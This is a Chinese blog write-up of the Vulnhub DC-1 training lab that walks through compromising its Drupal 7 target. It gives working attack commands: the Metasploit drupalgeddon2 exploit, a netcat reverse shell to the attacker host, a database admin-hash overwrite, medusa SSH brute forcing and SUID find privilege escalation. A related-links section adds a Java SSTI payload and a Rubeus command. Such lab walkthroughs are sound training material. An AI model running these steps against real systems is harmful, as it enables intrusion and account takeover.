DC-1靶场通关笔记

最新推荐文章于 2024-05-03 11:58:47 发布
最新推荐文章于 2024-05-03 11:58:47 发布
阅读量726 收藏 3
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/118888129
版权

0x00 DC-1靶场介绍

靶场介绍:关于VulnhubVulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试
渗透要求:靶机需要获得root权限,并找到所有的5个flag
环境配置:因不知道DC-1靶机的IP,所有我们需要将靶机和kali放在同一个局域网里面,这里我选择NAT模式

0x01 信息收集

首先进去DC-1靶场环境,显示一个登录页面,我们无法得到账户与密码,因为靶机在NAT模式,故可以用域内存活主机利用工具扫描域内存活主机

1)目标IP收集
这里利用kali扫描域内存活主机-----arp-scan -l
发现到存活三个存活主机
2)目标端口收集
上述通过查询得到192.168.213.139 为靶机DC-1目标IP
这里利用nmap端口扫描-----nmap -sS 192.168.213.139
查询到开启80web页面
3)扫描目录
这里利用端口扫描工具-扫描到IP存在robots.txt目录
发现目录

4)web页面信息收集
通过访问robots目录发现目标路径,通过访问80端口与robots下目录一致,进入目标web继续信息收集
1.已知开源CMS-Drupal 版本:7
2.中间件服务器:apache 版本:2.2.22
3.php版本:5.4.45
4.数据库类型:后面收集到为mysql
web页面信息收集

分析数据包

0x02 攻击测试

1.已知程序是开源CMS,尝试使用cms漏洞攻击
这里利用kali-msf搜索cms模块-----search-drupal
尝试使用payload攻击
网上搜索资料逐一尝试发现攻击荷载—exploit/unix/webapp/drupal_drupalgeddon2可以使用
攻击荷载信息配置

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
sf6 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp
set rhosts 192.168.213.139
run

攻击成功
获取反弹shell

kali:nc -lvvp 1111  
靶机 :nc -e /bin/bash 192.168.213.129 1111
kali:python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

0x03 渗透提权提升

查看目录下文件发现flag1
flag1.txt
翻译flag提示
每一个好的CMS都需要一个配置文件-你也一直需要
提示配置文件,想到网站cms的根配置文件,网上查询drupal配置文件位置
在这里插入图片描述

百度查询文件位置

find / -name settings.php

发现位置
查看网站目录 获取到flag2.txt 以及数据库为mysql账户密码
在这里插入图片描述
翻译flag2提示

蛮力和字典攻击是不是 *只有获得访问(您将需要访问)的方法。 *您可以如何处理这些凭据?

提示我们需要权限访问进行操作
首先登录数据库搜索相关信息,查看敏感表

mysql -udbuser -pR0ck3t

use databases;
use drupaldb;
show tables;
查询到敏感表users
查看表

users表
查看账户表发现密码经过特殊hash加密
之前我以及修改过密码
发现自己修改账户密码无法登录
查看到之前网站配置文件里面有个hash加密的文件 利用特殊hash加密123
登录数据库使用加密脚本得到123哈希—$S$D15BAuciJ7yEJ3lq0rLaZBw4Y/qK1fas08mWoAjZV.MwLx2gAKox

touch 11.txt
cd /var/www/
php scripts/password-hash.sh 123 > 11.txt
cat pwd.txt

修改admin密码登录后台

update users set pass='$S$D15BAuciJ7yEJ3lq0rLaZBw4Y/qK1fas08mWoAjZV.MwLx2gAKox' where uid=1;

登录后台发现flag3.txt
flag.txt

翻译flag3提示
Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow
提示我们需要特殊的fina权限去执行操作
返回终端查看账户发现flag4
flag4
查看flag4提示
flag4

您能否使用同一方法查找或访问根中的标记?

可能。但也许没那么容易。 也许是吧?
我们使用同一方法去执行操作
首先利用kali破解flag4密码

medusa -M ssh -h 192.168.213.139 -u flag4 -P /usr/share/john/password.lst -e ns -F

得到密码为:orange
ACCOUNT FOUND: [ssh] Host: 192.168.213.139 User: flag4 Password: orange [SUCCESS]

ssh登录flag4账户
flag4账户
按照前面提示利用unid提权

靶机开启监听 nc反弹shell  通过find提权
find flag4.txt -exec nc -lvp 2333 -e /bin/sh \;

回到kail:
─# nc 192.168.213.139 2333

发现为root权限
为最高权限
回到home目录发现最后一个flag
终极flag
最后一个flag翻译
恭喜通关

DC-1渗透结束!

告白热
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-1 靶机笔记
MZa1213123的博客
02-21 1149
1、搭建好靶机后,由于采用的是桥接模式,前对网段快速 ping 一下,(因为试过很多次 nmap 都要等很久,不知道什么原因)。也可用 sudo arp-scan -l 查看 arp 缓存得知目的主机的 ip 地址,前提是要在桥接模式。 2、使用 nmap 进行信息收集 可知 80 端口有 drupal 搭建的网站,而且是 drupal 7 经过在网上的一番搜索如何入手时 都是使用 msfconsole 对 drupal 进行渗透 对 drupal 在 msfconsole 中 .
DC-1靶机的渗透笔记
现代鲁滨逊的博客
03-07 221
环境:靶机—DC-1 (NAT模式)192.168.174.129 攻击机:Kali 192.168.174.128 任务:找齐5个flag 1. 发现主机:sudo arp-scan -l 第一次靶机环境配置错了,没扫出来 其他发现主机命令 arp-scan -l netdiscover -i eth0(网卡)-r 网关 nmap sn 网关/24 还能列出开放的端口 2. 扫描端口: sudo nmap -p- -A 目标IP 开放了22(ssh端口)、80、111、33799端口..
DC靶场系列--DC1
BGiscool的博客
06-28 4841
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7900
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vuln靶场——DC-1
qq_54480761的博客
05-03 1376
我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录。典型的drupal,启动Metersploit,MSF存在drupal模块,尝试使用msf渗透。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。搜索Drupal 7的漏洞发现可利用的漏洞很多,搜索与Drupal 7相关的漏洞利用模块。登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3。进行登录,密码是之前我们自己替换的。
DC-1靶场实战详解
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
DC-1靶场
mlws1900的博客
03-21 1384
下载地址把桥接设置为nat模式,打开靶机的时候会提示几个错误,点击重试即可启动靶机,如下图所示即可。
DC-1靶场搭建及渗透实战详细过程(DC靶场系列)
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
DC-DC PCB layout 指导.docx
06-18
1. Bad layout 会导致 EMI 干扰,降低 DC-DC 的性能。因此,需要尽量减少 layout 的噪声和干扰。 2. 开关大电流回路尽量短信号地和大电流(功率地)单独走线,并在芯片 GND 处单点连接。这样可以减少噪声和干扰,...
靶场系列之DC-1.md
07-26
靶场系列之DC-1.md
HCIE-DC笔记及面试宝典
09-24
HCIE-DC笔记及面试宝典 HCIE-DC笔记及面试宝典 HCIE-DC笔记及面试宝典 HCIE-DC笔记及面试宝典
DC-DC变换器Simulink仿真模型
08-07
具体到这个名为"DC_DC_PWM-RECTIFIER1.mdl"的Simulink模型,我们可以推断它是包含脉宽调制(PWM)和整流器功能的DC-DC变换器。PWM技术用于控制开关器件的导通时间,从而改变输出电压的平均值。而整流器则将交流信号...
DC-1靶场详解
苏生要努力
03-12 2833
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
DC1靶场 Drupal
m0_62438849的博客
03-02 1132
22端口是开放的,试试ssh登录呢, ssh 客户端用户名@服务器ip地址,我本来想以刚才的admin和1111111试试能否登录,不能登录。find / -perm -4000 2>/dev/null寻找 4000权限的文件,不显示其他的错误信息相当于过滤。点击Dashboard,看到flag3,特殊的访问权限将能帮助找到密码,需要执行命令行,在/etc/shadow。内容格式:x表示此用户设有密码,但不是真正的密码,真正的密码保存在 /etc/shadow 文件中。
Vulnhub系列之DC1靶场详解
weixin_50053818的博客
05-04 3362
文章目录环境drupal 7.x漏洞拿flag1在目录中找配置文件拿flag2改密码进网站拿flag2ssh爆破拿flag4提权拿最后的flag 环境 DC-1靶场 VMware虚拟机 kali drupal 7.x漏洞拿flag1 首先搭建好靶场。这次一次黑盒靶场测试,只能从虚拟机中查看DC1靶场的mac地址,从而查出目标靶机的IP。 所以目标IP地址为192.168.31.184,直接上nmap进行目标全面扫描。 由nmap扫描可以知道,目标靶机开放了22,80,111,42875端口,看到端
DC-1渗透靶场实战速通版
saber的博客
12-01 873
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限,你可以使用SSTI有效载荷发生器来执行特定类型的Java SSTI攻击。该有效载荷发生器可以生成针对Java SSTI的payload,启发于${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)...}。 4. 另外,你还可以使用Rubeus工具来申请访问自身的可转发服务票据。通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击中使用。 通过以上步骤,你可以成功通关ssti-lab靶场。请注意,在进行任何攻击前,确保你有合法的授权和使用权,并且遵守法律法规。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [WP-春秋云镜-Brute4Road靶场通关完全指南](https://blog.csdn.net/qq_45234543/article/details/128482984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ssti-payload:SSTI有效载荷生成器](https://download.csdn.net/download/weixin_42128558/15099898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值